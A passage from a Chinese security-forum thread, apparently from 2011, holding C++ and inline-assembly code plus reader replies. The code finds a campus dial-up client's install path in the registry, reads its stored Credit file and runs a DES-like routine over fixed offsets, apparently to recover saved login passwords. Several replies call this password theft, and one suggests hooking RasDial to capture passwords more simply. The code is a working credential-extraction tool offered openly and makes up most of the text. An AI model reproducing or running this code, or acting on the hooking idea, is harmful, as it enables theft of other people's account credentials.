0x08, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x08, 0x00, 0x00, 0x02, 0x00,
0x08, 0x02, 0x02, 0x08, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x08, 0x08, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x08, 0x08, 0x00, 0x00, 0x00, 0x00, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x00,
0x00, 0x02, 0x02, 0x00, 0x00, 0x00, 0x02, 0x08, 0x08, 0x00, 0x02, 0x08, 0x08, 0x02, 0x02, 0x00,
0x08, 0x02, 0x00, 0x08, 0x00, 0x02, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x08, 0x02, 0x00, 0x08,
0x08, 0x00, 0x00, 0x00, 0x08, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08,
0x00, 0x02, 0x02, 0x08, 0x00, 0x00, 0x00, 0x08, 0x08, 0x00, 0x02, 0x00, 0x08, 0x02, 0x00, 0x00,
0x00, 0x00, 0x02, 0x00, 0x00, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x00,
0x00, 0x02, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x08, 0x02, 0x02, 0x08, 0x00, 0x02, 0x00, 0x08,
0x08, 0x00, 0x00, 0x08, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x08,
0x08, 0x02, 0x00, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x08, 0x08, 0x02, 0x02, 0x08,
0x08, 0x00, 0x00, 0x00, 0x08, 0x02, 0x02, 0x00, 0x00, 0x02, 0x02, 0x00, 0x08, 0x00, 0x00, 0x08,
0x00, 0x00, 0x02, 0x08, 0x08, 0x02, 0x00, 0x08, 0x08, 0x02, 0x00, 0x00, 0x00, 0x00, 0x02, 0x08,
0x08, 0x02, 0x02, 0x00, 0x08, 0x00, 0x00, 0x00, 0x08, 0x00, 0x02, 0x08, 0x00, 0x02, 0x02, 0x00
};
char key4[] =
{
0x01, 0x20, 0x80, 0x00, 0x81, 0x20, 0x00, 0x00, 0x81, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x80, 0x20, 0x80, 0x00, 0x81, 0x00, 0x80, 0x00, 0x01, 0x00, 0x80, 0x00, 0x01, 0x20, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x80, 0x00, 0x00, 0x20, 0x80, 0x00, 0x81, 0x20, 0x80, 0x00,
0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x01, 0x00, 0x80, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x01, 0x20, 0x80, 0x00,
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x01, 0x20, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00,
0x81, 0x00, 0x80, 0x00, 0x01, 0x00, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00,
0x00, 0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x00, 0x81, 0x20, 0x80, 0x00, 0x81, 0x00, 0x00, 0x00,
0x80, 0x00, 0x80, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00, 0x20, 0x80, 0x00, 0x81, 0x20, 0x80, 0x00,
0x81, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x80, 0x00,
0x80, 0x20, 0x00, 0x00, 0x80, 0x00, 0x80, 0x00, 0x81, 0x00, 0x80, 0x00, 0x01, 0x00, 0x00, 0x00,
0x01, 0x20, 0x80, 0x00, 0x81, 0x20, 0x00, 0x00, 0x81, 0x20, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x81, 0x20, 0x80, 0x00, 0x81, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x00, 0x00,
0x01, 0x00, 0x80, 0x00, 0x01, 0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x00, 0x81, 0x00, 0x80, 0x00,
0x01, 0x20, 0x00, 0x00, 0x80, 0x20, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x01, 0x20, 0x80, 0x00,
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x20, 0x00, 0x00, 0x80, 0x20, 0x80, 0x00
};
char key5[] =
{
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x08, 0x02, 0x00, 0x00, 0x08, 0x02, 0x00, 0x01, 0x00, 0x42,
0x00, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x08, 0x02,
0x00, 0x01, 0x08, 0x40, 0x00, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x01, 0x08, 0x40,
0x00, 0x01, 0x00, 0x42, 0x00, 0x00, 0x08, 0x42, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, 0x00, 0x40,
0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x08, 0x40, 0x00, 0x00, 0x08, 0x40, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x40, 0x00, 0x01, 0x08, 0x42, 0x00, 0x01, 0x08, 0x42, 0x00, 0x01, 0x00, 0x02,
0x00, 0x00, 0x08, 0x42, 0x00, 0x01, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x42,
0x00, 0x01, 0x08, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x42, 0x00, 0x01, 0x08, 0x00,
0x00, 0x00, 0x08, 0x00, 0x00, 0x01, 0x00, 0x42, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02,
0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x08, 0x02, 0x00, 0x01, 0x00, 0x42, 0x00, 0x01, 0x08, 0x40,
0x00, 0x01, 0x00, 0x02, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x08, 0x42, 0x00, 0x01, 0x08, 0x02,
0x00, 0x01, 0x08, 0x40, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x08, 0x42,
0x00, 0x01, 0x08, 0x42, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00, 0x00, 0x42, 0x00, 0x01, 0x08, 0x42,
0x00, 0x00, 0x08, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x40, 0x00, 0x00, 0x00, 0x42,
0x00, 0x01, 0x08, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x01, 0x00, 0x40, 0x00, 0x00, 0x08, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x40, 0x00, 0x01, 0x08, 0x02, 0x00, 0x01, 0x00, 0x40,
};
char key6[] =
{
0x10, 0x00, 0x00, 0x20, 0x00, 0x00, 0x40, 0x20, 0x00, 0x40, 0x00, 0x00, 0x10, 0x40, 0x40, 0x20,
0x00, 0x00, 0x40, 0x20, 0x10, 0x00, 0x00, 0x00, 0x10, 0x40, 0x40, 0x20, 0x00, 0x00, 0x40, 0x00,
0x00, 0x40, 0x00, 0x20, 0x10, 0x40, 0x40, 0x00, 0x00, 0x00, 0x40, 0x00, 0x10, 0x00, 0x00, 0x20,
0x10, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x10, 0x40, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20, 0x00, 0x40, 0x00, 0x00,
0x00, 0x40, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x20,
0x10, 0x00, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x10, 0x40, 0x40, 0x00, 0x00, 0x40, 0x40, 0x20,
0x10, 0x40, 0x00, 0x00, 0x00, 0x40, 0x40, 0x00, 0x00, 0x40, 0x40, 0x20, 0x00, 0x00, 0x00, 0x20,
0x00, 0x40, 0x00, 0x20, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x20, 0x00, 0x40, 0x40, 0x00,
0x10, 0x40, 0x40, 0x20, 0x00, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20,
0x00, 0x00, 0x40, 0x00, 0x00, 0x40, 0x00, 0x20, 0x00, 0x00, 0x00, 0x20, 0x10, 0x40, 0x00, 0x00,
0x10, 0x00, 0x00, 0x20, 0x10, 0x40, 0x40, 0x20, 0x00, 0x40, 0x40, 0x00, 0x00, 0x00, 0x40, 0x20,
0x10, 0x40, 0x40, 0x00, 0x00, 0x40, 0x40, 0x20, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x40, 0x20,
0x10, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x40, 0x20, 0x10, 0x40, 0x40, 0x00,
0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00,
0x00, 0x40, 0x40, 0x20, 0x00, 0x00, 0x00, 0x20, 0x10, 0x00, 0x40, 0x00, 0x10, 0x40, 0x00, 0x20,
};
char key7[] =
{
0x00, 0x00, 0x20, 0x00, 0x02, 0x00, 0x20, 0x04, 0x02, 0x08, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00,
0x00, 0x08, 0x00, 0x00, 0x02, 0x08, 0x00, 0x04, 0x02, 0x08, 0x20, 0x00, 0x00, 0x08, 0x20, 0x04,
0x02, 0x08, 0x20, 0x04, 0x00, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04,
0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x02, 0x00, 0x20, 0x04, 0x02, 0x08, 0x00, 0x00,
0x00, 0x08, 0x00, 0x04, 0x02, 0x08, 0x20, 0x00, 0x02, 0x00, 0x20, 0x00, 0x00, 0x08, 0x00, 0x04,
0x02, 0x00, 0x00, 0x04, 0x00, 0x00, 0x20, 0x04, 0x00, 0x08, 0x20, 0x04, 0x02, 0x00, 0x20, 0x00,
0x00, 0x00, 0x20, 0x04, 0x00, 0x08, 0x00, 0x00, 0x02, 0x08, 0x00, 0x00, 0x02, 0x08, 0x20, 0x04,
0x00, 0x08, 0x20, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x08, 0x20, 0x00,
0x00, 0x00, 0x00, 0x04, 0x00, 0x08, 0x20, 0x00, 0x00, 0x00, 0x20, 0x00, 0x02, 0x08, 0x00, 0x04,
0x02, 0x08, 0x00, 0x04, 0x02, 0x00, 0x20, 0x04, 0x02, 0x00, 0x20, 0x04, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x08, 0x00, 0x04, 0x00, 0x00, 0x20, 0x00,
0x00, 0x08, 0x20, 0x04, 0x02, 0x08, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x08, 0x20, 0x04,
0x02, 0x08, 0x00, 0x00, 0x02, 0x00, 0x00, 0x04, 0x02, 0x08, 0x20, 0x04, 0x00, 0x00, 0x20, 0x04,
0x00, 0x08, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x04,
0x00, 0x00, 0x00, 0x00, 0x02, 0x08, 0x20, 0x00, 0x00, 0x00, 0x20, 0x04, 0x00, 0x08, 0x00, 0x00,
0x02, 0x00, 0x00, 0x04, 0x00, 0x08, 0x00, 0x04, 0x00, 0x08, 0x00, 0x00, 0x02, 0x00, 0x20, 0x00,
};
char key8[] =
{
0x40, 0x10, 0x00, 0x10, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x40, 0x10, 0x04, 0x10,
0x00, 0x00, 0x00, 0x10, 0x40, 0x10, 0x00, 0x10, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10,
0x40, 0x00, 0x04, 0x00, 0x00, 0x00, 0x04, 0x10, 0x40, 0x10, 0x04, 0x10, 0x00, 0x10, 0x04, 0x00,
0x00, 0x10, 0x04, 0x10, 0x40, 0x10, 0x04, 0x00, 0x00, 0x10, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x04, 0x10, 0x40, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x10, 0x40, 0x10, 0x00, 0x00,
0x00, 0x10, 0x04, 0x00, 0x40, 0x00, 0x04, 0x00, 0x40, 0x00, 0x04, 0x10, 0x00, 0x10, 0x04, 0x10,
0x40, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x04, 0x10,
0x40, 0x00, 0x00, 0x10, 0x00, 0x10, 0x00, 0x10, 0x40, 0x10, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00,
0x40, 0x10, 0x04, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x10, 0x04, 0x10, 0x00, 0x10, 0x00, 0x00,
0x40, 0x00, 0x00, 0x00, 0x40, 0x00, 0x04, 0x10, 0x00, 0x10, 0x00, 0x00, 0x40, 0x10, 0x04, 0x00,
0x00, 0x10, 0x00, 0x10, 0x40, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x10, 0x00, 0x00, 0x04, 0x10,
0x40, 0x00, 0x04, 0x10, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x04, 0x00, 0x40, 0x10, 0x00, 0x10,
0x00, 0x00, 0x00, 0x00, 0x40, 0x10, 0x04, 0x10, 0x40, 0x00, 0x04, 0x00, 0x40, 0x00, 0x00, 0x10,
0x00, 0x00, 0x04, 0x10, 0x00, 0x10, 0x00, 0x10, 0x40, 0x10, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00,
0x40, 0x10, 0x04, 0x10, 0x00, 0x10, 0x04, 0x00, 0x00, 0x10, 0x04, 0x00, 0x40, 0x10, 0x00, 0x00,
0x40, 0x10, 0x00, 0x00, 0x40, 0x00, 0x04, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x10, 0x04, 0x10,
};

int _tmain(int argc, _TCHAR* argv[])
{
    char *p;
    char *t;
    p = readfile();
    encode(p + 0x30, 0x20);
    encode(p + 0x50, 0x20);
    encode(p + 0x70, 0x10);
    encode(p + 0x80, 0x10);
    encode(p + 0x80, 0x10);
    encode(p + 0x8, 0x28);
    encode(p + 0xA4, 0x10);
    encode(p + 0xE4, 0x10);
    return 0;
}

char* readdir()
{
    //读取注册表,获取安装路径
    char *dir;
    dir = new char[1024];
    DWORD dwType = REG_SZ;
    DWORD dwLength = 1024;
    HKEY rp;
    int l;
    int f;
    if (RegOpenKeyA(HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\ecp\\", &rp) != ERROR_SUCCESS)
    {
        MessageBoxA(0, "打开注册表错误", "提示", 0);
        ExitProcess(0);
    }
    l = sizeof(dir);
    if (RegQueryValueExA(rp, "URL Protocol", 0, &dwType, (LPBYTE)dir, &dwLength) != ERROR_SUCCESS)
    {
        MessageBoxA(0, "读取注册表错误", "提示", 0);
        ExitProcess(0);
    }
    l = strlen(dir);
    f = 3;
    while (f)
    {
        l--;
        if (dir[l] == '\\')
        {
            f--;
        }
        dir[l] = 0;
    }
    strcat(dir, "\\bin\\Credit");
    return dir;
}

char* readfile()
{
    char* buffer;
    buffer = new char[0x168c];
    FILE *fp;
    fp = fopen(readdir(), "rb");
    if (!fp)
    {
        MessageBoxA(0, "读取文件出错", "提示", 0);
        ExitProcess(0);
    }
    fread(buffer, sizeof(char), 0x168c, fp);
    fclose(fp);
    return buffer;
}

void encode(char *buffer, int len)
{
    char *p;
    while (len)
    {
        p = encode1(buffer);
        encode2(buffer, p);
        encode3(buffer);
        len = len - 8;
        buffer = buffer + 8;
    }
}

char* encode1(char *buffer)
{
    char *p;
    p = new char[8];
    p[0] = buffer[3];
    p[1] = buffer[2];
    p[2] = buffer[1];
    p[3] = buffer[0];
    p[4] = buffer[7];
    p[5] = buffer[6];
    p[6] = buffer[5];
    p[7] = buffer[4];
    return p;
}

void encode3(char *buffer)
{
    char *p;
    p = buffer;
    char t;
    t = p[0];
    p[0] = p[3];
    p[3] = t;
    t = p[1];
    p[1] = p[2];
    p[2] = t;
    p = p + 4;
    t = p[0];
    p[0] = p[3];
    p[3] = t;
    t = p[1];
    p[1] = p[2];
    p[2] = t;
}

void encode2(char *buffer, char *key)
{
    __asm
    {
        lea eax, pass
        push eax
        lea eax, key
        push eax
        lea eax, buffer
        push eax
        mov ecx, dword ptr [esp+8]
        push ebx
        push ebp
        push esi
        mov eax, dword ptr [ecx]
        mov edx, dword ptr [ecx+4]
        mov ecx, eax
        mov esi, edx
        shr ecx, 4
        and ecx, 0x0F0F0F0F
        and esi, 0x0F0F0F0F
        xor ecx, esi
        push edi
        xor edx, ecx
        mov dword ptr [esp+0x10], 8
        shl ecx, 4
        xor eax, ecx
        mov esi, edx
        mov ecx, eax
        and esi, 0x0FFFF
        shr ecx, 0x10
        xor ecx, esi
        xor edx, ecx
        shl ecx, 0x10
        xor eax, ecx
        mov ecx, edx
        shr ecx, 2
        mov esi, eax
        and ecx, 0x33333333
        and esi, 0x33333333
        xor ecx, esi
        xor eax, ecx
        shl ecx, 2
        xor edx, ecx
        mov esi, eax
        mov ecx, edx
        and esi, 0x0FF00FF
        shr ecx, 8
        and ecx, 0x0FF00FF
        xor ecx, esi
        mov esi, dword ptr [esp+0x1C]
        xor eax, ecx
        shl ecx, 8
        xor edx, ecx
        mov ecx, edx
        add edx, edx
        shr ecx, 0x1F
        or ecx, edx
        mov edx, ecx
        xor edx, eax
        and edx, 0xAAAAAAAA
        xor eax, edx
        xor ecx, edx
        mov edx, eax
        add eax, eax
        shr edx, 0x1F
        or edx, eax
        L058:
        mov ebx, dword ptr [esi]
        mov eax, ecx
        mov edi, ecx
        add esi, 4
        shl eax, 0x1C
        shr edi, 4
        or eax, edi
        add esi, 4
        xor eax, ebx
        add esi, 4
        mov ebx, eax
        mov edi, eax
        shr ebx, 0x10
        and ebx, 0x3F
        add esi, 4
        shr edi, 0x18
        push eax
        lea eax, key3
        mov ebp, dword ptr [ebx*4+eax]
        pop eax
        mov ebx, eax
        and edi, 0x3F
        and eax, 0x3F
        shr ebx, 8
        push eax
        lea eax, key1
        mov edi, dword ptr [edi*4+eax]
        pop eax
        and ebx, 0x3F
        or edi, ebp
        push eax
        lea eax, key5
        mov ebp, dword ptr [ebx*4+eax]
        pop eax
        push ecx
        lea ecx, key7
        mov ebx, dword ptr [eax*4+ecx]
        pop ecx
        mov eax, dword ptr [esi-4]
        or edi, ebp
        xor eax, ecx
        or edi, ebx
        mov ebx, eax
        mov ebp, eax
        shr ebx, 0x18
        and ebx, 0x3F
        shr ebp, 0x10
        push eax
        lea eax, key2
        mov ebx, dword ptr [ebx*4+eax]
        pop eax
        and ebp, 0x3F
        push eax
        lea eax, key4
        or ebx, dword ptr [ebp*4+eax]
        pop eax
        mov ebp, eax
        shr ebp, 8
        and ebp, 0x3F
        and eax, 0x3F
        push eax
        lea eax, key6
        or ebx, dword ptr [ebp*4+eax]
        pop eax
        push ecx
        lea ecx, key8
        mov ebp, dword ptr [eax*4+ecx]
        pop ecx
        or ebx, ebp
        or ebx, edi
        xor edx, ebx
        mov ebx, dword ptr [esi-8]
        mov eax, edx
        mov edi, edx
        shl eax, 0x1C
        shr edi, 4
        or eax, edi
        xor eax, ebx
        mov ebx, eax
        mov edi, eax
        shr ebx, 0x10
        and ebx, 0x3F
        shr edi, 0x18
        push ecx
        lea ecx, key3
        mov ebp, dword ptr [ebx*4+ecx]
        pop ecx
        mov ebx, eax
        and edi, 0x3F
        and eax, 0x3F
        shr ebx, 8
        push ecx
        lea ecx, key1
        mov edi, dword ptr [edi*4+ecx]
        pop ecx
        and ebx, 0x3F
        or edi, ebp
        push ecx
        lea ecx, key5
        mov ebp, dword ptr [ebx*4+ecx]
        lea ecx, key7
        mov ebx, dword ptr [eax*4+ecx]
        pop ecx
        mov eax, dword ptr [esi-4]
        or edi, ebp
        xor eax, edx
        or edi, ebx
        mov ebx, eax
        mov ebp, eax
        shr ebx, 0x18
        and ebx, 0x3F
        shr ebp, 0x10
        push ecx
        lea ecx, key2
        mov ebx, dword ptr [ebx*4+ecx]
        and ebp, 0x3F
        lea ecx, key4
        or ebx, dword ptr [ebp*4+ecx]
        mov ebp, eax
        and eax, 0x3F
        shr ebp, 8
        and ebp, 0x3F
        lea ecx, key6
        or ebx, dword ptr [ebp*4+ecx]
        lea ecx, key8
        mov ebp, dword ptr [eax*4+ecx]
        pop ecx
        mov eax, dword ptr [esp+0x10]
        or ebx, ebp
        or ebx, edi
        xor ecx, ebx
        dec eax
        mov dword ptr [esp+10], eax
        jnz L058
        mov eax, ecx
        pop edi
        shl eax, 0x1F
        shr ecx, 1
        or eax, ecx
        mov ecx, eax
        xor ecx, edx
        and ecx, 0xAAAAAAAA
        xor edx, ecx
        xor eax, ecx
        mov ecx, edx
        mov esi, eax
        shl ecx, 0x1F
        shr edx, 1
        or ecx, edx
        and esi, 0x0FF00FF
        mov edx, ecx
        shr edx, 8
        and edx, 0x0FF00FF
        xor edx, esi
        xor eax, edx
        shl edx, 8
        xor ecx, edx
        mov esi, eax
        mov edx, ecx
        and esi, 0x33333333
        shr edx, 2
        and edx, 0x33333333
        xor edx, esi
        xor eax, edx
        shl edx, 2
        xor ecx, edx
        mov edx, eax
        mov esi, ecx
        shr edx, 0x10
        and esi, 0x0FFFF
        xor edx, esi
        xor ecx, edx
        shl edx, 0x10
        xor eax, edx
        mov esi, ecx
        mov edx, eax
        and esi, 0x0F0F0F0F
        shr edx, 4
        and edx, 0x0F0F0F0F
        xor edx, esi
        mov esi, edx
        shl esi, 4
        xor esi, eax
        mov eax, dword ptr [esp+0x14]
        xor edx, ecx
        mov dword ptr [eax], esi
        pop esi
        pop ebp
        mov dword ptr [eax+4], edx
        pop ebx
        pop ecx
    }
}


看雪线上公开课第01期《安全编码之SQL注入》,周日下午14:00,提前报名免费参与!

最新回复 (13)
松下书童 2011-7-4 19:00
2
0
写的很详细,顶楼主,请教个很菜的问题,
0x1E, 0x30, 0x38, 0x3C, 0x1A, 0x09, 0x26, 0x0B, 0x19, 0x10, 0x3A, 0x3C, 0x1A, 0x38, 0x26, 0x0B,
0x21, 0x3D, 0x3A, 0x34, 0x11, 0x0C, 0x2E, 0x1A, 0x2F, 0x03, 0x32, 0x36, 0x22, 0x02, 0x2D, 0x1A,
这些数据怎样从十六进制编辑器中弄出来,还带逗号?
monsterok 3 2011-7-4 19:10
3
0
OD的插件。。可以导出的!!
tihty 3 2011-7-4 20:13
4
0
好文,虽然我不在浙江上大学,不过还是要感谢楼主..
ttgood 2011-7-4 20:24
5
0
好。牛。nnnn
dayang 2011-7-4 21:01
6
0
我怎么感觉象是转载的?
monsterok 3 2011-7-4 22:10
7
0
因为前面多了一个首发站么?
monsterok 3 2011-7-6 11:42
8
0
大大们能不能给个精呀、!1!生活所迫!!!
lofrank 2011-7-8 12:03
9
0
对楼主的能力表示佩服
不过还不如hook RasDial获得密码简单

另外,盗密码有什么意思,
有本事还不如分析分析下闪讯的用户名加密算法以及心跳机制,做个支持路由器的第三方拨号器造福大家
monsterok 3 2011-7-8 13:35
10
0
鄙人小菜鸟。。高水平的活做不来呀!!!
MagicFuzzX 2011-7-8 14:23
11
0
9.10楼都是杭电的
monsterok 3 2011-7-8 14:26
12
0
你也是杭电的?
MagicFuzzX 2011-7-8 14:30
13
0
,当然了,两个大牛都在我QQ好友里面,当然我忘记退掉小号回复了
monsterok 3 2011-7-8 14:31
14
0
嘎嘎。。。报上名来。。。你是谁????
游客
登录 | 注册 方可回帖
返回